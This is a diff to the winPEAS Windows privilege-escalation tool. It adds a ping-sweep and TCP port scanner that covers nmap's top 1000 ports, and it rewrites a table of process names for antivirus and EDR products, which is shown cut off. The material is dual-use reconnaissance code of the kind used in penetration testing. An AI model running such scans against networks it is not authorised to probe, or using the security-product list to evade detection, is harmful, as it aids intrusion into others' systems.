diff --git a/winPEAS/winPEASexe/winPEAS/Info/NetworkInfo/NetworkScanner/NetworkScanner.cs b/winPEAS/winPEASexe/winPEAS/Info/NetworkInfo/NetworkScanner/NetworkScanner.cs
new file mode 100644
index 0000000..d403b6e
--- /dev/null
+++ b/winPEAS/winPEASexe/winPEAS/Info/NetworkInfo/NetworkScanner/NetworkScanner.cs
@@ -0,0 +1,93 @@
+using System;
+using System.Collections.Generic;
+using System.Threading.Tasks;
+using winPEAS.Helpers;
+
+namespace winPEAS.Info.NetworkInfo.NetworkScanner
+{
+ internal class NetworkScanner
+ {
+ enum ScanMode
+ {
+ Auto,
+ IPAddressList,
+ IPAddressNetmask,
+ }
+
+ private string[] ipAddressList;
+ private bool isAuto = false;
+ private ScanMode scanMode = ScanMode.IPAddressList;
+ private string baseAddress;
+ private string netmask;
+ IEnumerable ports;
+
+ public NetworkScanner(string options, IEnumerable ports = null)
+ {
+ /*
+ --network "auto" - find interfaces/hosts automatically
+ --network "10.10.10.10,10.10.10.20" - scan only selected ip address(es)
+ --network "10.10.10.10/24" - scan host based on ip address/netmask
+ */
+ this.ports = ports;
+
+ if (string.Equals(options, "auto", StringComparison.InvariantCultureIgnoreCase))
+ {
+ scanMode = ScanMode.Auto;
+ }
+ else if (options.Contains("/"))
+ {
+ var parts = options.Split('/');
+ baseAddress = parts[0];
+ netmask = parts[1];
+ scanMode = ScanMode.IPAddressNetmask;
+ }
+ else
+ {
+ ipAddressList = options.Split(',');
+ scanMode = ScanMode.IPAddressList;
+ }
+ }
+
+ public void Scan()
+ {
+ try
+ {
+ Beaprint.GreatPrint("Scanning network (it might take some time)...");
+
+ List aliveHosts = new List();
+ NetPinger netPinger = new NetPinger();
+
+ if (scanMode == ScanMode.Auto)
+ {
+ // this is the "auto" mode
+ foreach (var ipAddressAndNetmask in NetworkUtils.GetInternalInterfaces())
+ {
+ netPinger.AddRange(ipAddressAndNetmask.Item1, ipAddressAndNetmask.Item2);
+ }
+ }
+ if (scanMode == ScanMode.IPAddressNetmask)
+ {
+ netPinger.AddRange(baseAddress, netmask);
+ }
+ else if (scanMode == ScanMode.IPAddressList)
+ {
+ netPinger.AddRange(ipAddressList);
+ }
+
+ var task = netPinger.RunPingSweepAsync();
+ task.Wait();
+ aliveHosts.AddRange(netPinger.HostsAlive);
+
+ PortScanner ps = new PortScanner(this.ports);
+ Parallel.ForEach(aliveHosts, host =>
+ {
+ ps.Start(host);
+ });
+ }
+ catch (Exception e)
+ {
+ Beaprint.PrintException(e.Message);
+ }
+ }
+ }
+}
diff --git a/winPEAS/winPEASexe/winPEAS/Info/NetworkInfo/NetworkScanner/NetworkUtils.cs b/winPEAS/winPEASexe/winPEAS/Info/NetworkInfo/NetworkScanner/NetworkUtils.cs
new file mode 100644
index 0000000..9e7757f
--- /dev/null
+++ b/winPEAS/winPEASexe/winPEAS/Info/NetworkInfo/NetworkScanner/NetworkUtils.cs
@@ -0,0 +1,221 @@
+using System;
+using System.Collections.Generic;
+using System.ComponentModel;
+using System.Linq;
+using System.Net;
+using System.Net.NetworkInformation;
+
+namespace winPEAS.Info.NetworkInfo.NetworkScanner
+{
+ internal static class NetworkUtils
+ {
+
+ ///
+ /// IPAddress to UInteger
+ ///
+ ///
+ ///
+ public static uint IPToUInt(this string ipAddress)
+ {
+ if (string.IsNullOrEmpty(ipAddress))
+ return 0;
+
+ if (IPAddress.TryParse(ipAddress, out IPAddress ip))
+ {
+ var bytes = ip.GetAddressBytes();
+ Array.Reverse(bytes);
+ return BitConverter.ToUInt32(bytes, 0);
+ }
+ else
+ return 0;
+
+ }
+
+ ///
+ /// IP in Uinteger to string
+ ///
+ ///
+ ///
+ public static string IPToString(this uint ipUInt)
+ {
+ return ToIPAddress(ipUInt).ToString();
+ }
+
+
+ ///
+ /// IP in Uinteger to IPAddress
+ ///
+ ///
+ ///
+ public static IPAddress ToIPAddress(this uint ipUInt)
+ {
+ var bytes = BitConverter.GetBytes(ipUInt);
+ Array.Reverse(bytes);
+ return new IPAddress(bytes);
+ }
+
+ ///
+ /// First and Last IPv4 from IP + Mask
+ ///
+ ///
+ /// Accepts CIDR or IP. Example 255.255.255.0 or 24
+ /// Removes not usable IPs from Range
+ ///
+ ///
+ /// If ´filterUsable=false´ first IP is not usable and last is reserved for broadcast.
+ ///
+ public static string[] GetIpRange(string ipv4, string mask, bool filterUsable)
+ {
+ uint[] uiIpRange = GetIpUintRange(ipv4, mask, filterUsable);
+
+ return Array.ConvertAll(uiIpRange, x => IPToString(x));
+ }
+
+ ///
+ /// First and Last IPv4 + Mask.
+ ///
+ ///
+ /// Accepts CIDR or IP. Example 255.255.255.0 or 24
+ /// Removes not usable IPs from Range
+ ///
+ ///
+ /// First IP is not usable and last is reserverd for broadcast.
+ /// Can use all IPs in between
+ ///
+ public static uint[] GetIpUintRange(string ipv4, string mask, bool filterUsable)
+ {
+ uint sub;
+ //check if mask is CIDR Notation
+ if (mask.Contains("."))
+ {
+ sub = IPToUInt(mask);
+ }
+ else
+ {
+ sub = ~(0xffffffff >> Convert.ToInt32(mask));
+ }
+
+ uint ip2 = IPToUInt(ipv4);
+
+
+ uint first = ip2 & sub;
+ uint last = first | (0xffffffff & ~sub);
+
+ if (filterUsable)
+ {
+ first += 1;
+ last -= 1;
+ }
+
+ return new uint[] { first, last };
+ }
+
+ public static IEnumerable GetIPRange(IPAddress startIP, IPAddress endIP)
+ {
+ uint sIP = ipToUint(startIP.GetAddressBytes());
+ uint eIP = ipToUint(endIP.GetAddressBytes());
+ while (sIP <= eIP)
+ {
+ yield return new IPAddress(reverseBytesArray(sIP)).ToString();
+ sIP++;
+ }
+ }
+
+ public static string CidrToNetmask(int cidr)
+ {
+ var nmask = 0xFFFFFFFF;
+ nmask <<= 32 - cidr;
+ byte[] bytes = BitConverter.GetBytes(nmask);
+ Array.Reverse(bytes);
+ nmask = BitConverter.ToUInt32(bytes, 0);
+ var netmask = new System.Net.IPAddress(nmask);
+ return netmask.ToString();
+ }
+
+ public static IEnumerable GetIPAddressesByNetmask(string ipAddress, string netmask)
+ {
+ // TODO
+ // e.g.
+ // netmask should be e.g. 24 - currently we only support this format
+ string[] range = NetworkUtils.GetIpRange(ipAddress, netmask, false);
+
+ return range;
+ }
+
+ public static IEnumerable GetHostsByIPAndNetmask(string ipAddressAndNetmask)
+ {
+ // TODO
+ // get hosts by ip address & netmask
+
+ // https://itecnote.com/tecnote/c-proper-way-to-scan-a-range-of-ip-addresses/
+ // we nned to (maybe in parallel)
+ // - ping e.g. 3 times
+ // - scan top 5 ports
+ var parts = ipAddressAndNetmask.Split(':');
+
+ return new List
+ {
+ parts[0]
+ };
+ }
+
+ public static List> GetInternalInterfaces()
+ {
+ List> result = new List>();
+
+ foreach (NetworkInterface ni in NetworkInterface.GetAllNetworkInterfaces())
+ {
+ if (ni.OperationalStatus == OperationalStatus.Up &&
+ (ni.NetworkInterfaceType == NetworkInterfaceType.Wireless80211 || ni.NetworkInterfaceType == NetworkInterfaceType.Ethernet))
+ {
+ // Console.WriteLine();
+ foreach (UnicastIPAddressInformation ip in ni.GetIPProperties().UnicastAddresses)
+ {
+ if (ip.Address.AddressFamily == System.Net.Sockets.AddressFamily.InterNetwork)
+ {
+ // we need ip address and a netmask as well
+ result.Add(new Tuple(ip.Address.ToString(), ip.IPv4Mask.ToString()));
+ }
+ }
+ }
+ }
+
+ return result;
+ }
+
+ /* Convert bytes array to 32 bit long value */
+ static uint ipToUint(byte[] ipBytes)
+ {
+ ByteConverter bConvert = new ByteConverter();
+ uint ipUint = 0;
+
+ int shift = 24; // indicates number of bits left for shifting
+ foreach (byte b in ipBytes)
+ {
+ if (ipUint == 0)
+ {
+ ipUint = (uint)bConvert.ConvertTo(b, typeof(uint)) << shift;
+ shift -= 8;
+ continue;
+ }
+
+ if (shift >= 8)
+ ipUint += (uint)bConvert.ConvertTo(b, typeof(uint)) << shift;
+ else
+ ipUint += (uint)bConvert.ConvertTo(b, typeof(uint));
+
+ shift -= 8;
+ }
+
+ return ipUint;
+ }
+
+ /* reverse byte order in array */
+ private static uint reverseBytesArray(uint ip)
+ {
+ byte[] bytes = BitConverter.GetBytes(ip);
+ bytes = bytes.Reverse().ToArray();
+ return (uint)BitConverter.ToInt32(bytes, 0);
+ }
+ }
+}
diff --git a/winPEAS/winPEASexe/winPEAS/Info/NetworkInfo/NetworkScanner/PortScanner.cs b/winPEAS/winPEASexe/winPEAS/Info/NetworkInfo/NetworkScanner/PortScanner.cs
new file mode 100644
index 0000000..ca8b229
--- /dev/null
+++ b/winPEAS/winPEASexe/winPEAS/Info/NetworkInfo/NetworkScanner/PortScanner.cs
@@ -0,0 +1,122 @@
+using System;
+using System.Collections.Generic;
+using System.Net.Sockets;
+using System.Threading;
+using System.Threading.Tasks;
+
+namespace winPEAS.Info.NetworkInfo.NetworkScanner
+{
+ class PortScanner
+ {
+ private int TcpTimeout = 500; // ms
+
+ #region nmap tcp top 1000
+
+ static List nmapTop1000TCPPorts = new List
+ {
+ 1,3,4,6,7,9,13,17,19,20,21,22,23,24,25,26,30,32,33,37,42,43,49,53,70,79,80,81,82,83,84,85,88,89,90,99,100,106,109,110,111,113,119,125,135,139,143,144,146,161,163,
+ 179,199,211,212,222,254,255,256,259,264,280,301,306,311,340,366,389,406,407,416,417,425,427,443,444,445,458,464,465,481,497,500,512,513,514,515,524,541,543,544,545,
+ 548,554,555,563,587,593,616,617,625,631,636,646,648,666,667,668,683,687,691,700,705,711,714,720,722,726,749,765,777,783,787,800,801,808,843,873,880,888,898,900,901,
+ 902,903,911,912,981,987,990,992,993,995,999,1000,1001,1002,1007,1009,1010,1011,1021,1022,1023,1024,1025,1026,1027,1028,1029,1030,1031,1032,1033,1034,1035,1036,1037,
+ 1038,1039,1040,1041,1042,1043,1044,1045,1046,1047,1048,1049,1050,1051,1052,1053,1054,1055,1056,1057,1058,1059,1060,1061,1062,1063,1064,1065,1066,1067,1068,1069,1070,
+ 1071,1072,1073,1074,1075,1076,1077,1078,1079,1080,1081,1082,1083,1084,1085,1086,1087,1088,1089,1090,1091,1092,1093,1094,1095,1096,1097,1098,1099,1100,1102,1104,1105,
+ 1106,1107,1108,1110,1111,1112,1113,1114,1117,1119,1121,1122,1123,1124,1126,1130,1131,1132,1137,1138,1141,1145,1147,1148,1149,1151,1152,1154,1163,1164,1165,1166,1169,
+ 1174,1175,1183,1185,1186,1187,1192,1198,1199,1201,1213,1216,1217,1218,1233,1234,1236,1244,1247,1248,1259,1271,1272,1277,1287,1296,1300,1301,1309,1310,1311,1322,1328,
+ 1334,1352,1417,1433,1434,1443,1455,1461,1494,1500,1501,1503,1521,1524,1533,1556,1580,1583,1594,1600,1641,1658,1666,1687,1688,1700,1717,1718,1719,1720,1721,1723,1755,
+ 1761,1782,1783,1801,1805,1812,1839,1840,1862,1863,1864,1875,1900,1914,1935,1947,1971,1972,1974,1984,1998,1999,2000,2001,2002,2003,2004,2005,2006,2007,2008,2009,2010,
+ 2013,2020,2021,2022,2030,2033,2034,2035,2038,2040,2041,2042,2043,2045,2046,2047,2048,2049,2065,2068,2099,2100,2103,2105,2106,2107,2111,2119,2121,2126,2135,2144,2160,
+ 2161,2170,2179,2190,2191,2196,2200,2222,2251,2260,2288,2301,2323,2366,2381,2382,2383,2393,2394,2399,2401,2492,2500,2522,2525,2557,2601,2602,2604,2605,2607,2608,2638,
+ 2701,2702,2710,2717,2718,2725,2800,2809,2811,2869,2875,2909,2910,2920,2967,2968,2998,3000,3001,3003,3005,3006,3007,3011,3013,3017,3030,3031,3052,3071,3077,3128,3168,
+ 3211,3221,3260,3261,3268,3269,3283,3300,3301,3306,3322,3323,3324,3325,3333,3351,3367,3369,3370,3371,3372,3389,3390,3404,3476,3493,3517,3527,3546,3551,3580,3659,3689,
+ 3690,3703,3737,3766,3784,3800,3801,3809,3814,3826,3827,3828,3851,3869,3871,3878,3880,3889,3905,3914,3918,3920,3945,3971,3986,3995,3998,4000,4001,4002,4003,4004,4005,
+ 4006,4045,4111,4125,4126,4129,4224,4242,4279,4321,4343,4443,4444,4445,4446,4449,4550,4567,4662,4848,4899,4900,4998,5000,5001,5002,5003,5004,5009,5030,5033,5050,5051,
+ 5054,5060,5061,5080,5087,5100,5101,5102,5120,5190,5200,5214,5221,5222,5225,5226,5269,5280,5298,5357,5405,5414,5431,5432,5440,5500,5510,5544,5550,5555,5560,5566,5631,
+ 5633,5666,5678,5679,5718,5730,5800,5801,5802,5810,5811,5815,5822,5825,5850,5859,5862,5877,5900,5901,5902,5903,5904,5906,5907,5910,5911,5915,5922,5925,5950,5952,5959,
+ 5960,5961,5962,5963,5987,5988,5989,5998,5999,6000,6001,6002,6003,6004,6005,6006,6007,6009,6025,6059,6100,6101,6106,6112,6123,6129,6156,6346,6389,6502,6510,6543,6547,
+ 6565,6566,6567,6580,6646,6666,6667,6668,6669,6689,6692,6699,6779,6788,6789,6792,6839,6881,6901,6969,7000,7001,7002,7004,7007,7019,7025,7070,7100,7103,7106,7200,7201,
+ 7402,7435,7443,7496,7512,7625,7627,7676,7741,7777,7778,7800,7911,7920,7921,7937,7938,7999,8000,8001,8002,8007,8008,8009,8010,8011,8021,8022,8031,8042,8045,8080,8081,
+ 8082,8083,8084,8085,8086,8087,8088,8089,8090,8093,8099,8100,8180,8181,8192,8193,8194,8200,8222,8254,8290,8291,8292,8300,8333,8383,8400,8402,8443,8500,8600,8649,8651,
+ 8652,8654,8701,8800,8873,8888,8899,8994,9000,9001,9002,9003,9009,9010,9011,9040,9050,9071,9080,9081,9090,9091,9099,9100,9101,9102,9103,9110,9111,9200,9207,9220,9290,
+ 9415,9418,9485,9500,9502,9503,9535,9575,9593,9594,9595,9618,9666,9876,9877,9878,9898,9900,9917,9929,9943,9944,9968,9998,9999,10000,10001,10002,10003,10004,10009,10010,
+ 10012,10024,10025,10082,10180,10215,10243,10566,10616,10617,10621,10626,10628,10629,10778,11110,11111,11967,12000,12174,12265,12345,13456,13722,13782,13783,14000,14238,
+ 14441,14442,15000,15002,15003,15004,15660,15742,16000,16001,16012,16016,16018,16080,16113,16992,16993,17877,17988,18040,18101,18988,19101,19283,19315,19350,19780,19801,
+ 19842,20000,20005,20031,20221,20222,20828,21571,22939,23502,24444,24800,25734,25735,26214,27000,27352,27353,27355,27356,27715,28201,30000,30718,30951,31038,31337,32768,
+ 32769,32770,32771,32772,32773,32774,32775,32776,32777,32778,32779,32780,32781,32782,32783,32784,32785,33354,33899,34571,34572,34573,35500,38292,40193,40911,41511,42510,
+ 44176,44442,44443,44501,45100,48080,49152,49153,49154,49155,49156,49157,49158,49159,49160,49161,49163,49165,49167,49175,49176,49400,49999,50000,50001,50002,50003,50006,
+ 50300,50389,50500,50636,50800,51103,51493,52673,52822,52848,52869,54045,54328,55055,55056,55555,55600,56737,56738,57294,57797,58080,60020,60443,61532,61900,62078,63331,
+ 64623,64680,65000,65129,65389
+ };
+
+ #endregion
+
+ private struct TcpPortState
+ {
+ public TcpClient MainClient { get; set; }
+ public bool IsTcpPortOpen { get; set; }
+ }
+
+ IEnumerable portsToScan = nmapTop1000TCPPorts;
+
+ public PortScanner(IEnumerable ports)
+ {
+ if (ports != null)
+ {
+ portsToScan = ports;
+ }
+ }
+
+ public void Start(string host)
+ {
+ Parallel.ForEach(portsToScan, port =>
+ {
+ RunScanTcp(host, port);
+ });
+ }
+
+ public void RunScanTcp(string host, int port)
+ {
+ Thread.Sleep(1);
+
+ var newClient = new TcpClient();
+
+ var state = new TcpPortState
+ {
+ MainClient = newClient,
+ IsTcpPortOpen = true
+ };
+
+ IAsyncResult ar = newClient.BeginConnect(host, port, AsyncCallback, state);
+ state.IsTcpPortOpen = ar.AsyncWaitHandle.WaitOne(TcpTimeout, false);
+
+ if (state.IsTcpPortOpen == false || newClient.Connected == false)
+ {
+ return;
+ }
+
+ Console.WriteLine("[+] Open TCP port at: {0}:{1}", host, port);
+ }
+
+
+ void AsyncCallback(IAsyncResult asyncResult)
+ {
+ var state = (TcpPortState)asyncResult.AsyncState;
+ TcpClient client = state.MainClient;
+
+ try
+ {
+ client.EndConnect(asyncResult);
+ }
+ catch
+ {
+ return;
+ }
+
+ if (client.Connected && state.IsTcpPortOpen)
+ {
+ return;
+ }
+
+ client.Close();
+ }
+ }
+}
diff --git a/winPEAS/winPEASexe/winPEAS/Info/ProcessInfo/DefensiveProcesses.cs b/winPEAS/winPEASexe/winPEAS/Info/ProcessInfo/DefensiveProcesses.cs
index c656c0c..6873d4b 100644
--- a/winPEAS/winPEASexe/winPEAS/Info/ProcessInfo/DefensiveProcesses.cs
+++ b/winPEAS/winPEASexe/winPEAS/Info/ProcessInfo/DefensiveProcesses.cs
@@ -4,664 +4,103 @@ namespace winPEAS.Info.ProcessInfo
{
static class DefensiveProcesses
{
- public static Dictionary Definitions = new Dictionary()
+ private static Dictionary> Definitions = new Dictionary>()
{
- {"mcshield.exe" , "McAfee AV"},
- {"windefend.exe" , "Windows Defender AV"},
- {"MSASCui.exe" , "Windows Defender AV"},
- {"MSASCuiL.exe" , "Windows Defender AV"},
- {"msmpeng.exe" , "Windows Defender AV"},
- {"msmpsvc.exe" , "Windows Defender AV"},
- {"WRSA.exe" , "WebRoot AV"},
- {"savservice.exe" , "Sophos AV"},
- {"TMCCSF.exe" , "Trend Micro AV"},
- {"symantec antivirus.exe" , "Symantec AV"},
- {"mbae.exe" , "MalwareBytes Anti-Exploit"},
- {"parity.exe" , "Bit9 application whitelisting"},
- {"cb.exe" , "Carbon Black behavioral analysis"},
- {"bds-vision.exe" , "BDS Vision behavioral analysis"},
- {"Triumfant.exe" , "Triumfant behavioral analysis"},
- {"CSFalcon.exe" , "CrowdStrike Falcon EDR"},
- {"ossec.exe" , "OSSEC intrusion detection"},
- {"TmPfw.exe" , "Trend Micro firewall"},
- {"dgagent.exe" , "Verdasys Digital Guardian DLP"},
- {"kvoop.exe" , " DLP process" },
- {"AAWTray.exe" , ""},
- {"ackwin32.exe" , ""},
- {"Ad-Aware.exe" , ""},
- {"adaware.exe" , ""},
- {"advxdwin.exe" , ""},
- {"agentsvr.exe" , ""},
- {"agentw.exe" , ""},
- {"alertsvc.exe" , ""},
- {"alevir.exe" , ""},
- {"alogserv.exe" , ""},
- {"amon9x.exe" , ""},
- {"anti-trojan.exe" , ""},
- {"antivirus.exe" , ""},
- {"ants.exe" , ""},
- {"apimonitor.exe" , ""},
- {"aplica32.exe" , ""},
- {"apvxdwin.exe" , ""},
- {"arr.exe" , ""},
- {"atcon.exe" , ""},
- {"atguard.exe" , ""},
- {"atro55en.exe" , ""},
- {"atupdater.exe" , ""},
- {"atwatch.exe" , ""},
- {"au.exe" , ""},
- {"aupdate.exe" , ""},
- {"auto-protect.nav80try.exe", ""},
- {"autodown.exe" , ""},
- {"autoruns.exe" , ""},
- {"autorunsc.exe" , ""},
- {"autotrace.exe" , ""},
- {"autoupdate.exe" , ""},
- {"avconsol.exe" , ""},
- {"ave32.exe" , ""},
- {"avgcc32.exe" , ""},
- {"avgctrl.exe" , ""},
- {"avgemc.exe" , ""},
- {"avgnt.exe" , ""},
- {"avgrsx.exe" , ""},
- {"avgserv.exe" , ""},
- {"avgserv9.exe" , ""},
- {"avguard.exe" , ""},
- {"avgwdsvc.exe" , ""},
- {"avgui.exe" , ""},
- {"avgw.exe" , ""},
- {"avkpop.exe" , ""},
- {"avkserv.exe" , ""},
- {"avkservice.exe" , ""},
- {"avkwctl9.exe" , ""},
- {"avltmain.exe" , ""},
- {"avnt.exe" , ""},
- {"avp.exe" , ""},
- {"avp32.exe" , ""},
- {"avpcc.exe" , ""},
- {"avpdos32.exe" , ""},
- {"avpm.exe" , ""},
- {"avptc32.exe" , ""},
- {"avpupd.exe" , ""},
- {"avsched32.exe" , ""},
- {"avsynmgr.exe" , ""},
- {"avwin.exe" , ""},
- {"avwin95.exe" , ""},
- {"avwinnt.exe" , ""},
- {"avwupd.exe" , ""},
- {"avwupd32.exe" , ""},
- {"avwupsrv.exe" , ""},
- {"avxmonitor9x.exe" , ""},
- {"avxmonitornt.exe" , ""},
- {"avxquar.exe" , ""},
- {"backweb.exe" , ""},
- {"bargains.exe" , ""},
- {"bd_professional.exe" , ""},
- {"beagle.exe" , ""},
- {"belt.exe" , ""},
- {"bidef.exe" , ""},
- {"bidserver.exe" , ""},
- {"bipcp.exe" , ""},
- {"bipcpevalsetup.exe" , ""},
- {"bisp.exe" , ""},
- {"blackd.exe" , ""},
- {"blackice.exe" , ""},
- {"blink.exe" , ""},
- {"blss.exe" , ""},
- {"bootconf.exe" , ""},
- {"bootwarn.exe" , ""},
- {"borg2.exe" , ""},
- {"bpc.exe" , ""},
- {"brasil.exe" , ""},
- {"bs120.exe" , ""},
- {"bundle.exe" , ""},
- {"bvt.exe" , ""},
- {"ccapp.exe" , ""},
- {"ccevtmgr.exe" , ""},
- {"ccpxysvc.exe" , ""},
- {"ccSvcHst.exe" , ""},
- {"cdp.exe" , ""},
- {"cfd.exe" , ""},
- {"cfgwiz.exe" , ""},
- {"cfiadmin.exe" , ""},
- {"cfiaudit.exe" , ""},
- {"cfinet.exe" , ""},
- {"cfinet32.exe" , ""},
- {"claw95.exe" , ""},
- {"claw95cf.exe" , ""},
- {"clean.exe" , ""},
- {"cleaner.exe" , ""},
- {"cleaner3.exe" , ""},
- {"cleanpc.exe" , ""},
- {"cleanup.exe" , ""},
- {"click.exe" , ""},
- {"cmdagent.exe" , ""},
- {"cmesys.exe" , ""},
- {"cmgrdian.exe" , ""},
- {"cmon016.exe" , ""},
- {"connectionmonitor.exe" , ""},
- {"cpd.exe" , ""},
- {"cpf9x206.exe" , ""},
- {"cpfnt206.exe" , ""},
- {"ctrl.exe" , ""},
- {"cv.exe" , ""},
- {"cwnb181.exe" , ""},
- {"cwntdwmo.exe" , ""},
- {"CylanceUI.exe" , ""},
- {"CyProtect.exe" , ""},
- {"CyUpdate.exe" , ""},
- {"cyserver.exe" , ""},
- {"cytray.exe" , ""},
- {"CyveraService.exe" , ""},
- {"datemanager.exe" , ""},
- {"dcomx.exe" , ""},
- {"defalert.exe" , ""},
- {"defscangui.exe" , ""},
- {"defwatch.exe" , ""},
- {"deputy.exe" , ""},
- {"divx.exe" , ""},
- {"dgprompt.exe" , ""},
- {"DgService.exe" , ""},
- {"dllcache.exe" , ""},
- {"dllreg.exe" , ""},
- {"doors.exe" , ""},
- {"dpf.exe" , ""},
- {"dpfsetup.exe" , ""},
- {"dpps2.exe" , ""},
- {"drwatson.exe" , ""},
- {"drweb32.exe" , ""},
- {"drwebupw.exe" , ""},
- {"dssagent.exe" , ""},
- {"dumpcap.exe" , ""},
- {"dvp95.exe" , ""},
- {"dvp95_0.exe" , ""},
- {"ecengine.exe" , ""},
- {"efpeadm.exe" , ""},
- {"egui.exe" , ""},
- {"ekrn.exe" , ""},
- {"emet_agent.exe" , ""},
- {"emet_service.exe" , ""},
- {"emsw.exe" , ""},
- {"engineserver.exe" , ""},
- {"ent.exe" , ""},
- {"esafe.exe" , ""},
- {"escanhnt.exe" , ""},
- {"escanv95.exe" , ""},
- {"espwatch.exe" , ""},
- {"ethereal.exe" , ""},
- {"etrustcipe.exe" , ""},
- {"evpn.exe" , ""},
- {"exantivirus-cnet.exe" , ""},
- {"exe.avxw.exe" , ""},
- {"expert.exe" , ""},
- {"explore.exe" , ""},
- {"f-agnt95.exe" , ""},
- {"f-prot.exe" , ""},
- {"f-prot95.exe" , ""},
- {"f-stopw.exe" , ""},
- {"fameh32.exe" , ""},
- {"fast.exe" , ""},
- {"fch32.exe" , ""},
- {"fcagswd.exe" , "McAfee DLP Agent"},
- {"fcags.exe" , "McAfee DLP Agent"},
- {"fih32.exe" , ""},
- {"findviru.exe" , ""},
- {"firesvc.exe" , "McAfee Host Intrusion Prevention"},
- {"firetray.exe" , ""},
- {"firewall.exe" , ""},
- {"fnrb32.exe" , ""},
- {"fp-win.exe" , ""},
- {"fp-win_trial.exe" , ""},
- {"fprot.exe" , ""},
- {"frameworkservice.exe" , ""},
- {"frminst.exe" , ""},
- {"frw.exe" , ""},
- {"fsaa.exe" , ""},
- {"fsav.exe" , ""},
- {"fsav32.exe" , ""},
- {"fsav530stbyb.exe" , ""},
- {"fsav530wtbyb.exe" , ""},
- {"fsav95.exe" , ""},
- {"fsgk32.exe" , ""},
- {"fsm32.exe" , ""},
- {"fsma32.exe" , ""},
- {"fsmb32.exe" , ""},
- {"gator.exe" , ""},
- {"gbmenu.exe" , ""},
- {"gbpoll.exe" , ""},
- {"generics.exe" , ""},
- {"gmt.exe" , ""},
- {"guard.exe" , ""},
- {"guarddog.exe" , ""},
- {"hacktracersetup.exe" , ""},
- {"hbinst.exe" , ""},
- {"hbsrv.exe" , ""},
- {"HijackThis.exe" , ""},
- {"hipsvc.exe" , ""},
- {"HipMgmt.exe" , "McAfee Host Intrusion Protection"},
- {"hotactio.exe" , ""},
- {"hotpatch.exe" , ""},
- {"htlog.exe" , ""},
- {"htpatch.exe" , ""},
- {"hwpe.exe" , ""},
- {"hxdl.exe" , ""},
- {"hxiul.exe" , ""},
- {"iamapp.exe" , ""},
- {"iamserv.exe" , ""},
- {"iamstats.exe" , ""},
- {"ibmasn.exe" , ""},
- {"ibmavsp.exe" , ""},
- {"icload95.exe" , ""},
- {"icloadnt.exe" , ""},
- {"icmon.exe" , ""},
- {"icsupp95.exe" , ""},
- {"icsuppnt.exe" , ""},
- {"idle.exe" , ""},
- {"iedll.exe" , ""},
- {"iedriver.exe" , ""},
- {"iface.exe" , ""},
- {"ifw2000.exe" , ""},
- {"inetlnfo.exe" , ""},
- {"infus.exe" , ""},
- {"infwin.exe" , ""},
- {"init.exe" , ""},
- {"intdel.exe" , ""},
- {"intren.exe" , ""},
- {"iomon98.exe" , ""},
- {"istsvc.exe" , ""},
- {"jammer.exe" , ""},
- {"jdbgmrg.exe" , ""},
- {"jedi.exe" , ""},
- {"kavlite40eng.exe" , ""},
- {"kavpers40eng.exe" , ""},
- {"kavpf.exe" , ""},
- {"kazza.exe" , ""},
- {"keenvalue.exe" , ""},
- {"kerio-pf-213-en-win.exe" , ""},
- {"kerio-wrl-421-en-win.exe" , ""},
- {"kerio-wrp-421-en-win.exe" , ""},
- {"kernel32.exe" , ""},
- {"KeyPass.exe" , ""},
- {"killprocesssetup161.exe" , ""},
- {"launcher.exe" , ""},
- {"ldnetmon.exe" , ""},
- {"ldpro.exe" , ""},
- {"ldpromenu.exe" , ""},
- {"ldscan.exe" , ""},
- {"lnetinfo.exe" , ""},
- {"loader.exe" , ""},
- {"localnet.exe" , ""},
- {"lockdown.exe" , ""},
- {"lockdown2000.exe" , ""},
- {"lookout.exe" , ""},
- {"lordpe.exe" , ""},
- {"lsetup.exe" , ""},
- {"luall.exe" , ""},
- {"luau.exe" , ""},
- {"lucomserver.exe" , ""},
- {"luinit.exe" , ""},
- {"luspt.exe" , ""},
- {"mapisvc32.exe" , ""},
- {"masvc.exe" , "McAfee Agent"},
- {"mbamservice.exe" , ""},
- {"mcafeefire.exe" , ""},
- {"mcagent.exe" , ""},
- {"mcmnhdlr.exe" , ""},
- {"mcscript.exe" , ""},
- {"mcscript_inuse.exe" , ""},
- {"mctool.exe" , ""},
- {"mctray.exe" , ""},
- {"mcupdate.exe" , ""},
- {"mcvsrte.exe" , ""},
- {"mcvsshld.exe" , ""},
- {"md.exe" , ""},
- {"mfeann.exe" , "McAfee VirusScan Enterprise"},
- {"mfemactl.exe" , "McAfee VirusScan Enterprise"},
- {"mfevtps.exe" , ""},
- {"mfin32.exe" , ""},
- {"mfw2en.exe" , ""},
- {"mfweng3.02d30.exe" , ""},
- {"mgavrtcl.exe" , ""},
- {"mgavrte.exe" , ""},
- {"mghtml.exe" , ""},
- {"mgui.exe" , ""},
- {"minilog.exe" , ""},
- {"minionhost.exe" , ""},
- {"mmod.exe" , ""},
- {"monitor.exe" , ""},
- {"moolive.exe" , ""},
- {"mostat.exe" , ""},
- {"mpfagent.exe" , ""},
- {"mpfservice.exe" , ""},
- {"mpftray.exe" , ""},
- {"mrflux.exe" , ""},
- {"msapp.exe" , ""},
- {"msbb.exe" , ""},
- {"msblast.exe" , ""},
- {"mscache.exe" , ""},
- {"msccn32.exe" , ""},
- {"mscman.exe" , ""},
- {"msconfig.exe" , ""},
- {"msdm.exe" , ""},
- {"msdos.exe" , ""},
- {"msiexec16.exe" , ""},
- {"msinfo32.exe" , ""},
- {"mslaugh.exe" , ""},
- {"msmgt.exe" , ""},
- {"msmsgri32.exe" , ""},
- {"MsSense.exe" , "Microsoft Defender ATP"},
- {"mssmmc32.exe" , ""},
- {"mssys.exe" , ""},
- {"msvxd.exe" , ""},
- {"mu0311ad.exe" , ""},
- {"mwatch.exe" , ""},
- {"n32scanw.exe" , ""},
- {"naprdmgr.exe" , ""},
- {"nav.exe" , ""},
- {"navap.navapsvc.exe" , ""},
- {"navapsvc.exe" , ""},
- {"navapw32.exe" , ""},
- {"navdx.exe" , ""},
- {"navlu32.exe" , ""},
- {"navnt.exe" , ""},
- {"navstub.exe" , ""},
- {"navw32.exe" , ""},
- {"navwnt.exe" , ""},
- {"nc2000.exe" , ""},
- {"ncinst4.exe" , ""},
- {"ndd32.exe" , ""},
- {"neomonitor.exe" , ""},
- {"neowatchlog.exe" , ""},
- {"netarmor.exe" , ""},
- {"netd32.exe" , ""},
- {"netinfo.exe" , ""},
- {"netmon.exe" , ""},
- {"netscanpro.exe" , ""},
- {"netspyhunter-1.2.exe" , ""},
- {"netstat.exe" , ""},
- {"netutils.exe" , ""},
- {"nisserv.exe" , ""},
- {"nisum.exe" , ""},
- {"nmain.exe" , ""},
- {"nod32.exe" , ""},
- {"normist.exe" , ""},
